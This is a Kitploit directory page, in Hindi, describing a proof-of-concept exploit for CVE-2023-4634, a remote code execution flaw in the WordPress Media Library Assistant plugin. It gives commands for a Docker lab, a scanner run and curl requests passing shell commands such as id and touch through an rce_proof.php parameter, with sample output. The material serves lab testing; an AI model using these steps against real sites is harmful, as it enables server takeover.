Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-4634-PoC — CVE-2023-4634 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, WordPress Media Library Assistant प्लगइन में एक रिमोट कोड निष्पादन भेद्यता। इसमें एक Docker-आधारित संवेदनशील वातावरण और स्वचालित स्कैनर शामिल है। | Kitploit
उपकरण/GitHubGitHub/evillm/cve-2023-4634-poc
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubevillm/cve-2023-4634-poc

CVE-2023-4634-PoC

CVE-2023-4634 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, WordPress Media Library Assistant प्लगइन में एक रिमोट कोड निष्पादन भेद्यता। इसमें एक Docker-आधारित संवेदनशील वातावरण और स्वचालित स्कैनर शामिल है।

रिपॉजिटरी देखें
137 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-4634 - वर्डप्रेस प्लगइन Media Library Assistant में RCE भेद्यता

1. वातावरण का निर्माण और प्रारंभ

root@kitploit:~
cd Stand
docker-compose up --build -d

2. सेवाओं के प्रारंभ होने की प्रतीक्षा (60 सेकंड)

root@kitploit:~
sleep 60
curl -I http://localhost:8080

3. भेद्यता स्कैनिंग प्रारंभ करें

root@kitploit:~
cd ../PoC/src
python3 scanner.py http://localhost:8080

4. RCE का मैन्युअल परीक्षण

root@kitploit:~
# id कमांड का परीक्षण
curl "http://localhost:8080/rce_proof.php?cmd=id"

# ping कमांड का परीक्षण
curl "http://localhost:8080/rce_proof.php?cmd=ping+-c+2+127.0.0.1"

# साक्ष्य फ़ाइल बनाना
curl "http://localhost:8080/rce_proof.php?cmd=touch+/tmp/rce_proof"

✅ अपेक्षित परिणाम

scanner.py का आउटपुट:

root@kitploit:~
[*] Scanning: http://localhost:8080
[+] WordPress is accessible
[+] Plugin found: v3.09
[+] Plugin is VULNERABLE!
[*] Testing RCE...
[+] id command executed
[+] ping command executed
[+] file_check command executed
[+] RCE CONFIRMED!
[+] Results saved to ../result.txt

result.txt की सामग्री:

root@kitploit:~
{
  "cve": "CVE-2023-4634",
  "target": "http://localhost:8080",
  "timestamp": "2025-12-21 13:49:19",
  "vulnerable": true,
  "findings": {
    "wordpress": true,
    "plugin_vulnerable": true,
    "rce_id": true,
    "rce_id_output": "uid=33(www-data) gid=33(www-data) groups=33(www-data)",
    "rce_ping": true,
    "rce_file_check": true
  },
  "plugin_version": "3.09",
  "status": "VULNERABLE"
}

🔧 तकनीकी विवरण

नेटवर्क:

  • WordPress: 172.20.0.2:80 (localhost:8080 पर उपलब्ध)
  • डेटाबेस: 172.20.0.3:3306
  • नेटवर्क: 172.20.0.0/24

आवश्यकताएँ:

  • CVE: CVE-2023-4634
  • भेद्य घटक: प्लगइन Media Library Assistant < 3.10
  • भेद्यता प्रकार: दूरस्थ कोड निष्पादन (RCE)
  • सिस्टम आवश्यकताएँ: Docker, Python 3.7+

📊 RCE का प्रमाण

  • ✅ HTTP के माध्यम से id कमांड का निष्पादन
  • ✅ HTTP के माध्यम से ping कमांड का निष्पादन
  • ✅ /tmp/ में फ़ाइलें बनाना
  • ✅ www-data अनुमतियों की पुष्टि
  • ✅ परिणाम result.txt में दस्तावेज़ित किए गए

🧹 सफाई

root@kitploit:~
cd Stand
docker-compose down -v
टूल डाउनलोड करें